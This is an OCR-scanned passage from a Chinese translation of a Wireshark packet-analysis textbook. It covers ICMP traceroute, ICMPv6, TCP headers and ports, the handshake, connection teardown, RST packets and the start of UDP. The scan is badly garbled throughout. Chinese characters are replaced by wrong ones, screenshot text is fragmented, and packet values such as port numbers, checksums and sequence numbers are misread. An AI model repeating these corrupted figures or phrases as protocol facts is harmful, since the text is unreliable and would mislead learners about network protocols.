ces Field: @x@8 (DSCP: CS@, ECN: Not-ECT) 


92 
ification: Bxff51 (65361) 





Fragment offset: ©@ 
> Time to live: 1 @ 
Protocol: ICMP (1) 
> Header checksum: @x8f1a [validation disabled] 
: 192.168.100.138 
ination: 4.2.2.1 
urce GeoIP: Unknown] 
[Destination GeoIP: Unknown ] 

Y Internet Control Message Protocol 
Type: 8 (Echo (ping) request) ©@ 
Code: @ 

Checksum: @xbaff [ 


] 
Identifier (BE): 1288 (8x8588) 
Identifier (LE): 5 (@x80685) 
uence number (BE): 14336 (@x3888) 
uence number (LE): 56 (Gx8838) 
> [No response seen] 
> Data (64 bytes) 





No.? I * Time: .O00000 * Source: 192,168. 100.138 * Destination: 4.2.2.1 * Protocol: TCM th: 105 * Info: Echo {Ping) request id=0NO500, seq=14336/56, tt=1 {no response fowund 


| ep 








图 7-32 一 个 TITL 值 为 1 的 ICMP echo 请 求 数 据 包 


乍 看 起 来 ， 这 个 数据 包 就 是 一 个 从 192.168.100.138 到 4.2.2.1 的 简单 
echo 请 求 ， 并 且 ICMP 中 的 每 一 个 部 分 都 与 echo 请 求 数据 包 相同 。 但 是 
当 展 开 这 个 数据 包 的 卫 头 时 ， 你 可 以 注意 到 一 个 奇怪 的 数字 。 这 个 数据 
包 的 TIL 被 设 为 了 1， 也 就 意味 着 这 个 数据 包 会 在 它 遇 到 的 第 一 个 路 由 


锅 处 极 丢 反 。 因 为 目标 地 址 4.2.2.1 是 一 个 互联 网 地 址 ， 我 们 融会 知道 源 
设备 和 目的 设备 之 前 至 少 会 有 一 个 路 由 大 ， 所 以 这 个 数据 包 不 会 到 过目 
的 地 。 这 对 我 们 来 说 是 个 好 事 ， 因 为 路 由 跟踪 正 是 需要 这 个 数据 包 只 到 
达 它 传输 的 第 一 个 路 由 需 。 


第 二 个 数据 包 正 如 所 期 望 的 那样 ， 是 前 往 目 的 地 路 径 上 第 一 个 路 由 
侣 发 回 的 啊 应 〈 见 图 7-33) 。 在 数据 包 到 达 192.168.100.1 这 个 设备 后 ， 
它 的 TIL 减 为 0， 所 以 它 不 能 继续 传输 ， 于 是 路 由 需 回 复 了 一 个 ICMP 员 
应 。 这 个 数据 包 的 类 型 是 11， 人 代码 是 0， 也 束 是 告诉 我 们 由 于 数据 包 的 
TITL 在 传输 过 程 中 超时 ， 因 此 目的 不 可 达 。 


闫 Wireshark . Packet 2 . icmp_traceroute 





ame 2: 70 bytes on wire (568 bits), ?8 bytes captured (568 bits) 
ion 4, Src: 192.168.168.1, Dst: 192.168.180.138 


sion: 4 
er Length: 28 bytes 
ices Field: @xc@ (DSCP: C56, ECN: Not-ECT) 


i ion: Gx491a (18714) 
to live: 


me 
rotocol: ICMP (1) 
checksum: @x288e [validation disabled] 


re 192-.168-100°138. Dst: 42.201 
lL 


Checksum: @xbaff [in ICMP error packet] 
Identifier (BE): 1289 (Gx8588) 
Identifier (LE): 5 (6x8885) 

Sequence number (BE): 14336 (Gx3888) 
Sequence number (LE): 56 (8@x8838) 











e: 192.168, 100.1 * Destination: 192,168, 700.138 * Protoeol: ICMP * Length: 70 * Into: Time-to-dive exreeded (Time to Wve exreeded in transit) 


Help 





图 7-33 ”来 自 路 人 径 上 第 一 个 路 由 右 的 ICMP 啊 应 


这 个 ICMP 数 据 包 有 时 候 被 叫 作 双 头 包 ， 因 为 这 个 ICMP 的 结尾 部 分 
包含 了 原先 echo 请 求 的 也 头 和 ICMP 数 据 的 副本 。 这 个 信息 被 证 明 在 网 
络 检修 的 时 候 非 常 有 用 。 


在 第 7 个 数据 包 前 ， 这 种 发 送 TTL 自 增 数据 包 的 过 程 又 出 现 了 两 
次 。 在 这 里 ， 除 了 了 PP 头 的 TIL 值 被 设 为 了 2， 从 而 保证 这 个 数据 包 会 在 
被 丢弃 前 到 达 第 二 跳 路 由 ， 你 还 可 以 看 到 和 第 一 个 数据 包 相 同 的 东西 。 
和 我 们 所 期 望 的 一 样 ， 我 们 从 下 一 跳 的 路 由 12.180.241.1 接 到 了 一 个 有 
着 同样 ICMP 目 的 不 可 达 和 TITL 超 时 的 啊 应 消息 。 这 种 将 TIL 目 增 1 的 过 


程 ， 一 直 持 续 到 数据 包 到 达 目 的 地 址 4.2.2.1。 


总 结 来 襄 ， 路 由 跟踪 要 与 路 入 上 的 每 一 个 路 由 器 进行 通信 ， 从 而 男 
出 前 往 目 的 地 的 路 由 图 ， 如 图 7-34 所 示 。 


国 Command Prompt 


Ftracert 44.2.2.1 


s.level3.net [4.2.2.1] 


racing route to a.resolve 
a maximum Ct 3 hops: 





图 7-34 ”路 由 跟 踩 功 能 的 样 例 输出 
一 一 


我 们 这 里 所 讨论 的 路 由 跟踪 主要 基于 Windows， 因 为 只 有 它 在 使 用 ICMP。Linux 上 的 路 
由 跟 躁 更 复 洒 一些 ， 并 使 用 了 其 他 协议 来 进行 路 由 路 径 的 跟 踩 。 














7.3.5 ICMP 第 6 版 〈ICMPv6 ) 


新 版 的 IPv6 协 议 依 赖 ICMP 来 进行 邻 大 请 求 和 路 径 探 索 ， 束 像 之 前 
演示 的 几 个 例子 那样 。ICMPv6 随 RFC4443 而 建立 ， 它 用 来 支持 IPv6 的 
特性 ， 还 有 其 他 一 些 额 外 增强 。 本 书 中 我 们 不 会 单独 过 多 地 讨论 
ICMPv6， 因 为 它 使 用 和 ICMP 一 样 的 报 文 结构 。 


ICMPv6 报 文 一 般 被 归 类 为 错误 消 上 息 或 报 香 消息。 你 可 以 在 IANA 上 
答 找 到 全 部 可 用 的 类 型 以 及 对 应 的 代 但 。 


这 一 半 主 要 同 你 介绍 了 数据 包 分 析 过 程 中 会 经 党 看 到 的 几 个 重要 的 
协议 。ARP、IP 和 ICMP 是 所 有 网 络 通信 的 基础 ， 并 且 对 于 你 每 天 进行 
的 工作 都 至 关 重 要 。 在 第 8 章 中 ， 我 们 将 会 表 看 一 些 常 用 的 传输 层 协 议 
一 TCP 和 UDP。 





[11CIDR 一 一 无 类 列 域 则 路 由 ，Classless Inter-Domain Routing 。 
者 注 





第 8 章 ”传输 层 协 议 





在 本 章 我 们 会 继续 学 习 几 个 协议 ， 以 及 它们 是 怎么 在 数据 包 层 面 工 
作 的 。 我 们 将 沿 着 OSI 模型 往 上 走 ， 看 一 看 传输 层 币 用 的 两 个 协议 一 一 
TCP 和 UDP。 


8.1 ”传输 控制 协议 《TCP) 


传输 控制 协议 (Transmission Control Protocol], TCP ) 的 最 终 目 的 是 
为 数据 提供 可 靠 的 端 到 端 传输 。TCP 在 RFC793 中 定义 ， 它 能 够 处 理 数 
握 的 顺序 并 恢复 错误 ， 并 且 最 终 保 证 数据 能 够 到 达 目 的 地 。TCP 被 认为 
是 一 个 面 回 连接 的 协议 。 因 为 它 在 传输 数据 之 前 会 事先 发 起 一 个 正式 的 
连接 ， 用 来 退 踩 数据 包 的 递送 。 当 传输 要 结束 时 ， 它 会 竹 斌 正式 地 关闭 
Se ed As 的 应 用 层 协议 都 依赖 于 TCP 和 耳 将 数据 包 传 输 
最终 日 o 


8.1.1 TCP 报 头 


TCP 所 供 了 证 多 功能 ， 并 且 反 映 在 了 其 尖 部 的 复 林 性 上 面 。 如 图 8-1 
所 示 ， 古 TCP 报 头 的 字段 。 


传输 控制 协议 (TCP) 





图 8-1 ”TCP 报头 
源 端 口 (Source Port) : 用 来 传输 数据 包 的 端口 。 
目的 二 口 (Destination Port) : 数据 包 将 要 补 发送 到 的 端口 。 


序 亏 〈Sequence Number) : 这 个 数字 用 来 表示 一 个 TCP 卢 段 ， 这 
个 域 用 来 你 证 数据 流 中 的 部 分 没有 缺失 。 


确认 号 “Acknowledgment Number) : 这 个 数字 是 在 通信 中 和 希望 
从 太一 个 设备 中 得 到 的 下 一 个 数据 包 的 序号 。 


标志 (Flags) : URG ACK PSH RST SYN 和 FIN 标 志 都 用 来 表示 所 
传输 的 TCP 数 据 包 的 类 型 。 


窗口 大 小 (Window Size) : TCP 接 收 者 缓冲 的 字 节 大 小 。 


校 验 和 (Checksum) : 用 来 保证 TICP 头 和 数据 的 内 容 在 抵达 有 目的 
地 时 的 完整 性 。 


条 和 急 指 针 (Urgent Pointer) : 如 条 设置 了 URG 位 ， 则 这 个 域 将 被 
检查 作为 额外 的 指令 ， 告 诉 CPU 从 数据 包 的 哪里 开始 读 取 数 据 。 

选项 (Options) : 各 种 可 选项 ， 可 以 在 TCP 数 据 包 中 进行 指定 。 
8.1.2 ”TCP 疡 口 


所 有 TCP 通 信和 净 会 使 用 源 问 口 和 目的 问 口 ， 而 这 些 可 以 在 每 个 TCP 


关中 找到 。 端 口 束 像 是 老式 电话 总 机 上 的 插口 。 一 个 总 机 操作 员 会 监视 
大 一 个 面板 上 的 指示 灯 和 插头 ， 当 指示 灯亮 起 的 时 候 ， 他 就 会 连接 这 个 
呼叫 者 ， 问 她 想 要 和 谁 通 话 ， 然 后 插 一 根 电 费 将 她 和 她 的 目的 位 置 连接 
起 来 。 每 次 呼叫 都 需要 有 一 个 源 端 口 〈 呼 叫 者 ) 和 一 个 日 的 端口 (接收 
者 ) 。TCP 妆 口 大 概 束 是 这 样 工 作 有 的。 


为 了 能 够 将 数据 传输 到 远程 服务 右 或 设备 的 特定 应 用 中 去 ，TCP 数 
据 包 必须 知道 远程 服务 所 监 昕 的 端口 。 如 末 你 想 要 试看 连接 其 他 闹 口 ， 
那么 这 个 通信 束 会 失败 。 

这 个 序列 中 的 源 咒 口 并 不 十 分 重要 ， 所 以 可 以 随机 选择 。 远 程 服 务 


句 也 可 以 很 轻易 地 从 友 送 过 来 的 原始 数据 包 中 得 到 这 个 痛 口 〈 见 图 8- 
2 





Ri 监听 在 80 端 口 
客户 端 的 Web 服 务 器 





| | 源 端口 3221/ 目 标 端口 25 一 一 > 人 < 
CT -中 一 一 ” 产 端 口 293/ 目 标 端口 3221 


ee 监听 在 25 端 口 
客户 端 的 邮件 服务 器 


图 8-2 ”TCP 使 用 端口 传输 数据 
人 在 使 用 TCP 进 行 通 信和 有 的 时 候 ， 我 们 有 65535 个 疾 口 可 供 使 用 ， 并 通 


第 将 这 些 疾 口 分 成 两 个 部 分 。 


1 一 1023 是 标准 关口 组 〈 急 略 掉 被 预 留 的 0) ， 特 定 服务 会 用 到 这 些 
通常 位 于 标准 端口 分 组 中 的 标准 端口 。 


1024 一 65535 是 临时 端口 组 〈 尽 管 一 些 操作 系统 对 此 有 痢 不 同 的 定 
义 ) ， 当 一 个 服务 想 在 任何 时 间 使 用 端口 进行 通信 的 时 候 ， 现 代 操 作 系 
统 都 会 随机 地 选择 一 个 源 端口 ， 让 通信 使 用 唯一 源 端口 。 这 些 源 端 口 通 
常 束 位 于 I 临 时 端口 组 。 





让 我 们 打开 文件 tcp_ports.pcapng， 看 一 下 一 些 不 同 的 TCP 数 据 包 ， 
并 识别 出 它们 所 使 用 的 问 口 号。 在 这 个 文件 中 ， 我 们 会 看 到 一 个 客户 六 
在 浏览 两 个 网 站 时 产生 的 HTTP 通 信 。 正 如 前 面 所 提 到 的 HTTP 使 用 TCP 
进行 通信 ， 这 将 是 一 个 非常 典型 的 TCP 流 量 肥 例 。 


在 这 个 文件 中 的 第 一 个 数据 包 中 ( 见 图 8-3) ， 一 开始 的 两 个 值 代 
表 着 这 个 数据 包 的 源 剖 口 和 目的 闹 口 。 这 个 数据 包 从 172.16.16.128 发 往 
212.58.226.142， 它 的 源 病 口 是 属 于 临时 疡 口 组 的 2826 (需要 记 仕 的 
是 ， 源 问 口 是 由 操作 系统 随机 选取 的 ， 尽 管 它们 可 能 会 在 随机 选择 的 过 
程 中 选择 递增 策略 ) 。 目 的 端口 是 一 个 标准 端口 80 端 口 。 这 个 标准 
端口 正 是 提供 给 使 用 HTTP 的 Web 服 务 器 使 用 的 。 





| Wireshark . Packet 1 .tcp_ports 





s on wire (528 bits), 66 bytes captured (528 bits) 
), Dst: D-Link 21:99:4c (96:65:5d-21:99:4c) 


(2826) @ 
四 


t Len: 8] 
equence number: 3691127924 
cknowledement number: 9 

der Length: 32 bytes 


Header 
Flags: 09x962 (SYN) 
Window size value:; 8192 
[Calculated window size: 8192] 
Checksum: @xcfeb [validation disabled] 
Urgent pointer: 8 

ons: (12 bytes), Maximum segment size, No-Qperation (NOP 








No.s I * Timer 0.000000 ' Sourcer 172.16.16.128 " Destnation: 212.S8.226.142 " 





图 8-3 ”在 TCP 尖 中 可 以 找到 源 端 口 和 目标 端口 


你 可 能 会 注意 到 Wireshark 将 这 些 端口 打上 了 slc-systemlog (2826) 
和 http (80) 的 标 容 。Wireshark 会 维护 一 个 咒 口 的 列表 ， 并 记录 它们 普 
过 的 应 用 。 虽 然 列 表 还 是 以 标准 问 口 为 主 ， 但 很 多 临时 器 口 也 关联 看 第 
用 的 服务 。 这 些 新 口 的 标签 可 能 会 让 人 迷惑 ， 所 以 一 般 来 说 最 好 通过 关 
闭 传 输 名 称 解析 来 禁用 它 。 选 择 Edit -> Preference -> Name Resolution， 
然后 取消 勺 选 Enable Transport Name Resolution 束 可 以 将 其 禁用 了。 如 果 
你 希望 保留 开启 这 个 功能 但 改变 Wireshark 对 于 每 一 个 端口 的 识别 ， 则 可 
以 通过 改变 Wireshark 程 序 目录 下 的 Services 文 件 来 实现 。 这 个 文件 是 根 
据 互 联网 数字 分 配 机 构 (Internet Assigned Numbers Authority, IANA) 的 
列表 编写 的 〈 要 想 了 解 如 何 编辑 名 称 解 术 文件， 请 回 到 人 第 5 草 

J5.3.3 小 万 ) 。 


第 二 个 数据 包 是 由 212.58.226.142 发 往 172.16.16.128 的 《〈 见 图 8- 
4) 。 除 了 IP 地 址 之 外 ， 源 疾 口 和 目的 妆 口 也 同样 有 所 改变 。 


纪 Wireshark. Packet 2 .tcp_ports 





e 2: 66 bytes on wire (528 bits), 66 bytes captured (528 bits) 
er net II, Src: D-Link 21:99:4c (90:05:5d:21:99:4c), Dst: IntelCor_5b:7d:4a (90:21:6a:5b:7d:4a) 


» Internet Protocol Versi Src: 212.58.226.142, Dst: 172.16.16.12 
v oa i i Port: 80 (88), Dst Port: 二 


m Segment size, No-Qperation (NOP), No-Operation (NOP), SACK permitted, No-Operation (NOP), Window scale 











No,: 2 " Time;: 0.1328627 - Source: 212.58.226.142 - Destination: 172.16.16.128 - Protoeol: TCP * Length: 66 * Inio: BO — 2828 [SYN, ACK] Seq=0 Ack=1 Win=5830 Len=0 M55=1406 SACK PERM=I WS5=128 


Close | 





图 8-4 ”在 反 向 通信 中 ， 源 端口 和 目标 端口 进行 了 互 换 
所 有 基 盾 TCP 的 过 信 部 以 相同 的 方式 工作 ; 选择 一 个 随机 的 源 端 口 


写 一 个 已 知 的 目的 端口 进行 通信 。 在 友 出 初始 数据 包 之 后 ， 远 程 设 备 就 
会 与 源 设备 使 用 建立 起 的 端口 进行 通信 。 


在 这 个 样 例 捕获 文件 中 还 有 为 外 一 个 通信 流 ， 你 可 以 试看 找 出 它 通 
信 时 使 用 的 病 口 。 


BE 





随 着 这 本 书 的 深入 ， 你 将 会 了 解 更 多 与 通用 协议 和 病 中 相关 联 的 站 口 ， 并 且 最 终 可 以 通 
过 端口 来 识别 使 用 它们 的 服务 和 设备 。 如 有 果 布 望 查 疯 详 细 的 通用 问 口 列表 ， 可 以 在 Wireshark 
的 系统 目录 里 访问 “services” 文 件 。 





8.1.3” ”TCP 的 三 次 握手 


所 有 蕉 于 TCP 的 过 信 都 秆 要 从 两 侣 主机 的 握手 开始 。 这 个 握手 过 各 
主要 布 望 能 达到 这 样 一 些 目 的 。 


。 你 证 传输 主机 可 以 确定 目的 主机 在 线 并 且 进 行 通 信 。 

。 让 传输 主机 确定 目标 主机 在 监听 传输 主机 试图 连接 的 问 口 。 

。 允许 传输 主机 同 目 标 主机 发 送 它 的 起 始 友 列 写 ， 使 得 两 台 主 机 可 以 
将 这 一 会 话 保 持 得 井然 有 序 。 


TCP 握 手 分 为 3 个 步骤 ， 如 网 8-5 所 示 。 在 第 一 步 中 ， 主 动 发 起 通信 


的 设备 (主机 A) 向 目标 〈 主 机 B) 发 送 了 一 个 TCP 数 据 包 。 这 个 初始 
数据 包 除 了 撒 层 协 议 头 之 外 不 包含 任何 数据 。 这 个 数据 包 的 TCP 头 设置 
了 SYN 标 志 ， 并 包含 了 在 通信 过 程 中 会 用 到 的 初始 序列 号 和 最 大 分 段 大 
小 (MSS) 。 主机 B 对 于 这 个 数据 包 回复 了 一 个 类 似 的 设置 了 SYN 和 
ACK 标 志 .以 及 包含 了 它 初始 序列 号 的 数据 包 。 最 后 ， 主 机 A 疝 主机 B 发 
送 最 后 一 个 仅 设 置 了 ACK 标 志 的 数据 包 。 在 这 个 过 程 完成 之 后 ， 双 方 设 
备 应 该 已 经 具有 了 开始 正常 通信 所 需 的 信息 。 





| 


图 8-5” TCP 三 次 握手 





TCP 数 据 包 在 称呼 上 通常 会 被 其 设置 的 标志 所 人 代表。 比如， 对 于 设置 了 SYN 标 志 的 TCP 
数据 包 ， 我 们 将 会 简称 其 为 SYN 包 。 因 此 TCP 握 手 过 程 中 使 用 的 数据 包 会 被 称 为 SYN 包 、 
SYN/ACK 包 和 ACK 包 。 





打开 tcp_handshake.pcapng， 可 以 更 直观 地 看 到 这 个 过 程 。 
Wireshark 为 了 分 析 的 倘 便 ， 引入 本 一 个 特 往 ， 可 以 将 TCP 数 据 包 的 序列 
写 蔡 换 为 相对 值 。 但 在 这 里 ， 我 们 将 这 个 功能 关闭 ， 以 便于 能 看 到 实际 
的 序列 号 值 。 选 择 Edit -> Preferences， 展 开 Protocols 并 选择 TCP， 然 后 
取消 勺 选 Relative Sequence Numbers and Window Scaling 杠 ， 并 单 击 OK 


束 可 以 禁用 了 了 。 


这 这 个 捕获 中 的 第 一 个 数据 包 是 我 们 的 初始 SYN 数 据 包 见 图 8- 
6) 。 这 个 数据 包 从 172.16.16.128 的 2826 端 口 发 往 212.58.226.142 的 80 端 
口 。 我 们 可 以 看 到 这 里 传输 的 序列 号 是 3691127924。 


| Wireshark .Packet 1 .tcp_handshake 


》 Frame 1: 66 bytes on wire (528 bits), 66 bytes captured (528 bits) 
> Ethernet II, Src: IntelCor 5b:7d:4a (80:21:6a:5b:7d:;4a), Dst: D-Link 21;99;4c (80:85:5d;21:99;4c) 
> Internet Protocol Version 4, Src: 172.16.16.128, Dst: 212.58.226.142 
a 

Source Port: 2826 

Destination Port: 88 

[Stream index: 8] 

[TCP Segment Len: 8] 

Sequence number: 3691127924 种 

Acknow]ledgment number: 9 

Header Length: 32 bytes 


Reserved: Not set 

Nonce: Not set 
= Congestion Window Reduced (CWR): Not set 
= ECN-Echo: Not set 

Urgent: Not set 

Acknowledgment: Not set 

Push: Not set 

Reset: Not set 


Fin: Not set 
[TCP Flags: | 
Window size value: 8192 
[Calculated window size: 8192] 
> Checksum: @xcfeb [validation disabled] 
Urgent pointer: 9 
> Options; (12 bytes), Maximum segment size, No-Operation (NOP), Window scale, No-Operation (NOP), No-Operation (MOP), SACK permitted 





No.: 1 * Time: 0.000000 * Souree: 172,16. 16.128 « Destinscion: 212,58.226.142 * Proweol: TEP * Lengeh: 88 * Inio: 2828 — 8B0 {SYN) Seo= 3691127924 Win=8192 len=0 MSS=1460 WS=4 SACK PERM=f 


| cose || rep | 








图 8-6 ”初始 SYN 数 据 包 


握手 中 第 二 个 数据 包 是 从 212.58.226.142 发 出 的 SYN/ACK 响 应 ( 见 
图 8-7) 。 这 个 数据 包 也 包含 着 这 台 主 机 的 初始 序列 号 (233779340) 以 
及 一 个 确认 号 〈2691127925) 。 这 个 确认 号 比 之 前 的 那个 数据 包 序 列 号 
大 1， 因 为 这 个 域 是 用 来 表示 主机 所 期 望 得 到 的 下 一 个 序列 号 的 值 的 。 


磊 Wireshark .Packet 2 ‘tcp_handshake 


> Frame 2: 66 bytes on wire (528 bits), 66 bytes captured (528 bits) 
> Ethernet II, Src: D-Link 21:99:4c (88:85:5d:21:99:4c), Dst: IntelCor 5b:7d:4a (8668:21:6a:5b:7d:4a) 
>》 Internet Protocol Version 4, Src: 212.58.226.142, Dst: 172.16.16.128 
v 

Source Port: 89 

Destination Port; 2826 

[Stream index: 8] 

[TCP Segment Len: 9] 

Sequence number: 233779349 [1) 

Acknowledgment number: 3691127925 他 

Header Length: 32 bytes 


Reserved: Not set 
Nonce: Not set 
Congestion Window Reduced (CWR):; Not set 
ECN-Echo: Not set 
= Urgent; Not set 
Acknowledgment: Set 
Push: Not set 
Reset: Not set 


Fin: Not set 
[TCP Flags: **** 站 中 中 及 + 站] 

Window size value: 5848 

[Calculated window size; 5849] 

Checksum: 9x9acg [validation disabled] 

Urgent pointer: 9 
> Options: (12 bytes), Maximum segment size, No-Operation (NOP), No-Operation (NOP), SACK permitted, No-Operation (NOP), Window scale 
> [SEQ/ACK analysis] 





No.: 2 " Time: 0.132627 * SOcw: 212.58.226.102 ° Destination: 172.16.16.128 ~ Protocol: TOP * Lengeh: 55 * Inio: BO —» 2826 [5YN, 4CU Seq=233779340 Ack=3691127925 Win=55%0 [en=0 M55=1405 54CK PERM=1 WS5=128 





图 8-7 SYN/ACK 响 应 


最 后 的 数据 包 是 从 172.16.16.128〔( 见 图 8-8) 发 出 的 ACK 数 据 包 。 这 
个 数据 包 正 如 所 期 绷 的 那样 ， 包 含 看 之 前 数据 包 人 确认 号 域 所 定义 的 友 列 
号 3691127925。 


帮 Wireshark , Packet 3 ,tcp_handshake 





e 3: 54 bytes 0 bits), 54 bytes captured (32 ts) 
et II, Src: Inte elco ys 7d:4a (80:21:6a :Sb:7d:4a), Dst -Li nk __ 21:99:4c (880:85:5d:21:99:4 ) 
”Internet Protocol Version 4, Src: 172.16.16.128, Dst: a pe 
n Contr i protocol, Src Port: 2826 (2826), Dst Port: 80 (88), Seq: 3691127925, Ack: 233779341, Len: 8 


Len: ©@] 
mber: 3691127925 OO 


now ent number: 233779341 
Header et bytes 
Flags: 8x810 (ACK) 
Bee. = ved: Not set 
-。 = Nonce: Not set 
= Congestion Window Reduced (CWR): Not set 
... = ECN-Echo: Not set 
“= Urgent: Not set 
= Acknowledgment; Set [2) 
h: Not set 








> [SEQ/ACK ee 


Ap- 了. Time: i32768 " Source’ 172,16,16.128 * Destination: 212,58.226,142 - Protocol: TCP * Length: 54 Jp: 2826 — 80 /ACK) Seq=3697127925 Ack=233779741 Win=16872 len=0 
Help 





图 8-8 ”最 后 的 ACK 包 


握手 发 生 在 每 个 TCP 的 通信 序列 之 前 。 当 在 一 个 繁忙 的 捕获 文件 中 
搜索 通 前 信和 序列 的 开头 时 ， 序 列 SYTN、SYN/ACK、ACK 是 一 个 很 好 的 标 


志 O 


8.1.4 ” TCP 链接 断 开 


所 有 的 问候 最 终 都 会 有 一 句 再 见 ， 在 TCP 中 ， 每 一 个 握手 和 终止 使 
连接 有 始 有 终 。TCP 终 止 用 来 在 两 台 设 备 完成 通信 后 正常 地 结束 连 
by 这 个 过 程 包 含 4 个 数据 包 ， 并 且 用 一 个 FIN 标 志 来 表明 连接 的 终结 。 


在 一 个 终止 序列 中 ， 主 机 A 通过 友 送 一 个 设置 了 FIN 和 ACK 标 志 的 
TCP 数 据 包 ， 告 诉 主 机 B 通 信和 完成 。 主机 B 以 一 个 ACK 数 据 包 响应 ， a 
传输 目 己 的 FIN/ACK 数 据 包 。 主机 A 啊 应 一 个 ACK 数 据 包 ， 然 后 结束 通 
信 过 程 。 这 个 过 程 如 网 8-9 所 示 。 





图 8-9” ”TCP 终止 过 程 


打开 文件 tcp_teardown.pcapng 可 以 在 Wireshark 中 看 到 这 个 过 程 。 在 
序列 的 第 一 个 数据 包 《 见 图 8-10) ， 你 可 以 看 到 位 于 67.228.110.120 的 设 
备 骨 过 发 送 有 大 FIN 和 ACK 标 志 的 数据 包 ， 来 开始 终止 过 程 。 


帮 Wireshark . Packet 1 .tcp teardown 





Frame 1: 60 bytes on wire (489 bits), 68 bytes captured (489 bits) 
”Ethernet II，Src: D-Link 21:99:4c (88:85:5d:21:99:4c), Dst: IntelCor 5b:7d:4a (88:21:6a:5b:7d:4a) 
; Internet Protocol Version 4, Src: 67.228.116.128, Dst: 172.16.16.128 
v Transmission Control Protocol, Src Port: 89 (88), Dst Port: 3363 (3363), Seq: 822643295，Ack: 2879388537, Len: 8 


Sa Se nt Len: 8@] 
e number: 822643295 
Ac 内 a edgmen nt number : 2879388537 
Header Length: 28 bytes 
Flags: 8x811 (FIN, ee 
2DDD . 


[TCP ee 亲本 率 率 来 素 林 及 六 玉环 
Window size value 
[Calc a te ss ow size 
[Window B fac - Own ) 
> Checksu ne Or279b [validetio n dis Dh 
Urgent pointer: 9 











Noe.: I ' Time: 0.000000 " Source: 67.228.110.120'" Destination® 172.16.1 





图 8-10 ”FIN/ACK 包 作为 终止 过 程 的 开始 


在 这 个 数据 包 被 发 出 去 之 后 ，172.16.16.128 使 用 了 一 个 ACK 数 据 包 
这- 行 喇 及 来 确认 第 一 个 数据 包 的 接收 ， 然 后 发 送 了 一 个 FINMACK 数 据 
包 。 整 个 过 程 在 67.228.110.120 发 送 了 最 终 的 ACK 之 后 结束 。 这 时 ， 这 
两 个 设备 的 通信 便 已 经 结束 ， 如 果 想 要 再 次 开始 通信 就 必须 完成 狐 的 
TCP 握 手 。 


8.1.5 TCP 重 置 


在 理想 情况 下 ， 每 一 个 连接 都 会 以 TCP 终 止 来 正常 结束 。 但 在 现实 
中 ， 连 接 经 常会 突然 断 挥 。 举 例 来 说， 这 可 能 是 由 于 一 个 潜在 的 攻击 者 
正在 进行 端口 扫描 ， 或 者 仅仅 是 主机 配置 错误 所 导致 。 在 这 些 情 况 下 ， 
束 需 要 使 用 设置 了 了 RST 标志 的 TCP 数 据 包 。RST 标 志 用 来 指出 连接 被 寞 
种 中 止 ， 或 拒绝 连接 请 求 。 


文件 tcp_refuseconnection.pcapng 给 出 了 一 个 包含 有 RST 数 据 包 网 络 
流量 的 例子 。 这 个 文件 中 的 第 一 个 数据 包 来 和 目 192.168.100.138， 其 符 试 
与 192.168.100.1 的 80 端 口 进行 通信 。 这 个 主机 不 知道 192.168.100.1 并 没 
有 在 监听 80 端 口 ， 因 为 那 是 一 个 思科 路 由 器 ， 并 且 并 没有 配置 Web 接 
口 ， 也 就 是 说 并 没有 服务 监听 80 端 口 的 连接 。 为 了 响应 这 个 连接 请 求 ， 
192.168.100.1 回 192.168.100.138 发 送 了 一 个 数据 包 ， 告 诉 它 其 对 于 80 端 
口 的 通信 无 效 。 几 8-11 中 展示 了 在 第 二 个 数据 包 的 TCP 头 中 这 个 连接 答 
试 突然 终止 的 情况 。RST 数 据 包 除了 包 合 RST 和 ACK 标 志 外 ， 没 有 任何 


人 JW 呈 


其 他 的 东西 ， 之 后 也 并 没有 额外 的 通信 。 


翅 Wireshark . Packet 2 . tcp_refuseconnection 





ame 2: 69 bytes on wire (488 bits), 68 bytes captured (488 bits) 
ernet II, Src: CiscoInc 4b:c9:7f (886:12:88:4b:c8:7f), Dst: CompalCo b8:59:b1 (68:16:d4:b8:59:b1) 
ernet Protocol Version 4, Src: 192.168.18686.1, Dst: 192.168.188.138 
nsmission Control Protocol, Src Port: 80 (88), Dst Port: 3372 (3372), Seq: ©@, Ack: 951657940, Len: @ 
rce Port: 80 
estination Port: 3372 
ex: @] 


[TCP Segment Len: 8] 
Sequence number: 8 
Acknowledgment number: 9518579468 
Header Length: 28 bytes 


[TCP Flags: 妾 训 率 家 训 素来 用 率 口 环 率 
Window size Value: 8 
window size: @] 
| dow scaline use 


ze scaling factor: -2 (no win 
cksum: 9x21b4 [validation disabled] 
t pointer:; 8 
[SEQ/ACK analysis] 
No.: 2 * Time: 0, O01316 * Source: 192.168, 100,1 " Destination: 192,168. 100.138 * Proweol: TCP " Lemgth: 60 " Inib: B80 — 3372 {RST ACK) Seq=0 Ack=951057940 Win=0 ten=0 


Help 














图 8-11 RST 和 ACK 标 志 代 表 着 通信 的 结 


RST 数 据 包 会 在 答 斌 通信 序列 的 开始 《〈 束 像 这 个 例子 一 样 ) 或 者 在 


主机 通信 的 中 途 ， 来 终止 通信 。 


8.2 用户 数据 报 协 议 


用 户 数 据 报 协 议 〈User Datagram Protocol UDP) 是 在 现代 网 络 中 
较 常 使 用 的 另外 一 种 第 4 层 协 议 。 如 果 说 TCP 是 为 了 满足 带 有 内 在 错误 
检测 的 可 犊 数据 传输 ， 那 么 UDP 主要 是 为 了 提供 高 速 的 传输 。 出 于 这 个 
原因 ，UDP 是 一 种 尽力 服务 ， 通 常会 被 称 为 无 连接 协议 。 一 个 无 连接 协 
议 并 不 会 正式 地 建 江 和 者 束 主 机 之 间 的 连接 ， 也 不 会 像 TCP 那 样 存在 握 
手 和 终止 过 程 。 

无 连接 协议 也 束 意 味 看 不 提供 可 徘 性 服务 ， 这 么 看 上 去 UDP 流 量 一 
点 都 不 稳定 。 事 实 上 也 正 是 如 此 ， 但 依赖 于 UDP 的 协议 通 利 都 会 有 其 目 
己 内 置 的 可 靠 性 服务 ， 或 者 使 用 ICMP 的 一 些 功 能 ， 来 保证 连接 更 可 靠 
一 些 。 举 例 来 说 ， 应 用 层 协 议 DNS 和 DHCP 高 度 依赖 于 数据 包 在 网 络 上 
传输 的 速度 ， 虽然 使 用 了 了 UDP 作为 它们 的 传输 层 协议 ， 但 还 是 它们 目 己 
进行 销 误 检 查 以 及 重 传 计时 。 


UDP 报头 结构 

UDP 头 比 TCP 头 要 小 得 多 ， 也 简单 得 多 。 如 图 8-12 所 示 ， 以 下 十 
UDP 报头 的 字段 。 

源 端 口 : 用 来 传输 数据 包 的 端口 。 

目标 器 口 : 数据 包 将 要 被 传输 到 的 端口 。 

数据 包 长 度 : 数据 包 的 字 节 长 度 。 

